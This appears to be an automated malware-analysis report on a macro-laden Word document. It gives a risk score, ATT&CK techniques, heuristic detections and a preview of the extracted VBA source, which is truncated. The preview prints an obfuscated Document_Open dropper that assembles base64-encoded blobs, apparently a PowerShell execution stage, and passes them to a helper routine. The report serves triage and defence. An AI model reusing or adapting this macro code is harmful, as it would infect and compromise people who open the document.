MALICIOUS
184
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a Word document containing VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code. The document body explicitly prompts the user to "Enable Content", a common social engineering tactic to bypass macro security. The VBA code appears to be obfuscated but the presence of Shell() and the lure strongly suggest it's designed to download and execute a second-stage payload.
Heuristics 7
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.day.com/dam/1.0 In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19342 bytes |
SHA-256: 69bea706a52c61f360ed3e505324ef0cd76ef2317137b7d6a68c41291b0d7ee0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() If 49 < 175 Then ' WAPUCu Else ' ww0t5xznT MsgBox "I9uxK6" End If If 883 - 16 = 25656 / 4276 Then tWtyPx = "ih3bVoSB" End If Ujnflh = "BYvfj" boLSU = tWtyPx & Ujnflh yaZBUDfQ = "1Wc1VTdFNURWx0UW1SdGNuSmlOVUpKY1doblVWUjFkMDVyUnpKb1dHcFZZVVJRVEdzclEyeGxNekU0TWpOa1oyMVpRelpNVFZoSWEybDBRM1kyT1hSNVRtMW1VVUZsVmpjMk1FWkpiRk5hYm05bk1taERkRVYwT0hKNU56ZEJPRXMwTVcxM2IybG9ZWEZLVlU1TFNuaHFNSEEzZVVWQlRucFpXR0oyZWxjMVdrWnFabnBQT0c5eE1USm9UVFpaVW0xWFdUZ3JPWE5yZG10cU0yRXhhbEpYTjBvMU1FRXJUVVlyTjBGV1pXMHdUMkZVV1dobU4zbE5" r85Ruc = "WbmxuT0ZSMFptVlRaMnBvWml0RU1XRkVkbmxSVVhGVmNXZ3JSMGd5TDBWaGMyWTRRVUZCUVNjcEtUc2dTVVZZSUNoT1pYY3RUMkpxWldOMElFbFBMbE4w" Wy7rAvlTf = "Y21WaGJWSm" Dim ei6Co ei6Co = 27 While ei6Co < 515 ei6Co = ei6Co + 29 Wend Ob3fOPNK9 = "cZwah6" hXYUNiC8h = UnMmjfo & ei6Co If 33 < 246 Then ' ZfnqYmM Else ' ijg9GUyPO MsgBox "j7Len" End If Dim DOdJw DOdJw = 15 While DOdJw <= 367 DOdJw = DOdJw + 39 Wend bBPQln = 6300 eG6i8 = HoD4Hu & DOdJw Dim Rs7i4 Rs7i4 = yaZBUDfQ & r85Ruc & Wy7rAvlTf bj9qMt = "xZV1JsY2loT1pYY3RUMkpxWldOMElFbFBMa052YlhCeVpYTnphVzl1TGtkNmFYQlRkSEpsWVcwb0pITXNXMGxQTGtOdmJY" eoYIs = "QnlaWE56YVc5dUxrTnZiWEJ5WlhOemFXOXVUVzlrWlYwNk9rUmxZMjl0Y0hKbGMzTXBLU2t1VW1WaFpGUnZSVzVrS0NrNw==" If 8 < 206 Then ' YkN6mL7 Else ' rvkBQ MsgBox "US0Hi3z" End If If 22464 / 26 = 28130 / 5626 Then eLDgA3t = "JChkAbngF" End If WoPDk = 23941 zEaih = eLDgA3t & WoPDk Dim SiMtD SiMtD = bj9qMt & eoYIs TG2Zxc = "Y0c5M1pYSnphR1ZzYkNBa2N6MU9aWGN0VDJKcVpXTjBJRWxQTGsxbGJXOXllVk4wY21WaGJTZ3NXME52Ym5abGNuUmRPanBHY205dFFtRnpaVFkwVTNSeWFXNW5LQ2RJTkhOSlFVRkJRVUZCUVVGQk1GaFBVVlYyUkUxQ2FrYzRZU3RUVVhsRmRHSnRhMjV" S81geDz = "4SzB4RFJVcDNTVXQxYVdkMWJESTRjRTV0TjBwaE5VeFJka3AxWWxOcU9UZDJXV2RsYmpjck9GQjVVelUzUW" Dim j6ytS j6ytS = 151 While j6ytS <= 274 j6ytS = j6ytS + 42 Wend AwHabYjv = "KaS9zFM" ujYNSv3hU = u62GYzTgt & j6ytS Dim EShdX EShdX = TG2Zxc & S81geDz If 61 < 163 Then ' we0UStT Else ' iqyRw MsgBox "Mot70l8" End If Dim Tr1GHfmj Tr1GHfmj = 252 While Tr1GHfmj <= 611 Tr1GHfmj = Tr1GHfmj + 41 Wend ZTBYgb = 61960 j3uniCVD7 = EqaIKEOf1 & Tr1GHfmj KZqmVIae = EShdX & Rs7i4 & SiMtD If 20 < 128 Then ' gWP7w Else ' QX2GbzRWQ MsgBox "hwQRiK2ud" End If If 20 < 128 Then ' QKSMQ93wF Else ' uDI4tBLJ MsgBox "qDFcapCu" End If If 57 < 232 Then ' yQpuDW Else ' FHMU2Wdu8 Debug.Print "XaJH4QpwC" End If If 996 + 8 = -141 + 148 Then wYaAyhbtW = "ij97FXZ" End If GBHQCqbn = 14514 gmJWnsVfR = wYaAyhbtW & GBHQCqbn If 20930 / 91 = 24724 / 3532 Then CZz4nqGO = "DkiVmYTAv" End If GIvjL0Kc = "F3Yh8KrDi" fT5FGqXSf = CZz4nqGO & GIvjL0Kc Dim YrSbMwgBk YrSbMwgBk = 82 While YrSbMwgBk <= 772 YrSbMwgBk = YrSbMwgBk + 30 Wend A73k8h = 25755 MXtyNeCOQ = Jkdvl & YrSbMwgBk Call Stalin(KZqmVIae) End Sub Attribute VB_Name = "qVnlqz" Sub Stalin(p23Y5F) If 13 < 149 Then ' uHwap2Acd Else ' fh1IN8 MsgBox "nqOwS4ZV" End If Dim TfhoE TfhoE = 60 While TfhoE < 803 TfhoE = TfhoE + 32 Wend dc6zOs = "ZEVhzrT4Y" NmjGdXb = XYm4eZ & TfhoE If 12121 / 17 = -375 + 390 Then QY0JOMl = "FHychL" End If fPs7evjQ = 9273 do1PN50JM = QY0JOMl & fPs7evjQ If 46 < 187 Then ' mHtsLax Else ' t9xAPOVY Debug.Print "S8Bijr" End If If 19 < 162 Then ' VxAfKm Else ' Cwt1Z4UMk Debug.Print "RZOR6" End If Dim qagwUSe qagwUSe = 90 While qagwUSe <= 816 qagwUSe = qagwUSe + 62 Wend sQgDVcYHX = "tnlv71" OUTtKo4 = Vh2IO & qagwUSe Dim uauOH uauOH = 141 While uauOH < 692 uauOH = uauOH + 56 Wend hJPIueOB = "uJ5dmyFZ" F1WNFvAEC = cAL8Xv & uauOH Dim QMrwRpqeF QMrwRpqeF = 141 While QMrwRpqeF < 692 QMrwRpqeF = QMrwRpqeF + 56 Wend muxEbva = "xETI451" b9yd5N = Q1amHCV4 & QMrwRpqeF Dim bNoOrVY4 bNoOrVY4 = 245 While bNoOrVY4 <= 461 bNoOrVY4 = bNoOrVY4 + 59 Wend IiA8OeG = "eTba5xOZl" C ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.